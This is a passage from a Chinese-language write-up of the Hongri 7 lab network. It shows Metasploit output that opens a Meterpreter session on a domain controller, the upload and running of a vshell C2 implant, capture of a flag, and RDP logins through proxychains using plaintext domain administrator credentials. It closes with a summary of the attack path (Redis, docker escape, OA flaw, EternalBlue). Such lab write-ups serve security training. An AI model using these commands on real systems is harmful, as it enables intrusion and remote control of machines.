[*] 192.168.93.30:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.113.154[\svcctl] ...
[*] 192.168.93.30:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.113.154[\svcctl] ...
[*] 192.168.93.30:445 - Obtaining a service manager handle...
[*] 192.168.93.30:445 - Creating the service...
[+] 192.168.93.30:445 - Successfully created the service
[*] 192.168.93.30:445 - Starting the service...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.93.30:445 - Removing the service...
[+] 192.168.93.30:445 - Successfully removed the service
[*] 192.168.93.30:445 - Closing service handle...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (232006 bytes) to 192.168.93.30
[*] Meterpreter session 1 opened (192.168.113.154:45679 -> 192.168.113.154:1003) at 2026-06-15 08:17:33 -0400

meterpreter > dir
Listing: C:\Windows\system32
============================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
040777/rwxrwxrwx  0         dir   2013-08-22 10:53:38 -0400  0409
040777/rwxrwxrwx  0         dir   2013-08-22 19:48:47 -0400  0804

之后我们就利用vshell生成一个新的windows正向连接使其上线到vsehll上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > upload /home/kali/Desktop/4444.exe C:\\4444.exe
[*] Uploading  : /home/kali/Desktop/4444.exe -> C:\4444.exe
[*] Uploaded 3.94 MiB of 3.94 MiB (100.0%): /home/kali/Desktop/4444.exe -> C:\4444.exe
[*] Completed  : /home/kali/Desktop/4444.exe -> C:\4444.exe
meterpreter > shell
Process 2884 created.
Channel 2 created.
Microsoft Windows [�汾 6.3.9600]
(c) 2013 Microsoft Corporation����������Ȩ����

C:\Windows\system32>cd /
cd /

C:\>4444.exe
4444.exe

我们执行之后在vshell上建立正向连接连接即可

成功上线了域控

我们可以在域控中即可找到flag

1
2
3
C:\>type C:\flag.txt
hr7test12340okm9ijn
C:\>

第五台

由于前面我们发现192.168.93.40这台机器开启了3389端口那么我们可以利用前面获取到的明文账号密码直接进行连接或者和第四台域控一样利用smb服务的永恒之蓝进行连接

proxychains4 -f /tmp/proxychains_rdp.conf xfreerdp /v:192.168.93.40:3389 /u:administrator /p:Whoami2021 /d:WHOAMIANONY /cert-ignore /clipboard

这里我们尝试使用远程连接

1
proxychains4  -f /tmp/proxychains_rdp.conf rdesktop -d WHOAMIANONY -u administrator -p Whoami2021 192.168.93.40:3389 -r disk:share=/home/kali/Desktop         //使用该指令共享文件夹将vshell生成的正向连接上传到机器中

上传到机器后

单击启动5555.exe即可建立正向连接成功上线

总结

该靶机的攻击路径图如下:

红日7靶机的考点十分经典有redis的未授权登录、docker逃逸、oa系统的漏洞、和smb永恒之蓝漏洞。

本次靶场使用的无境靶场的在线靶场所以其中上线c2的操作都是使用的正向连接,这也是我第一次使用vshell,综合来说vshell确实更加适合新手其图形界面和他简单化的操作都很好。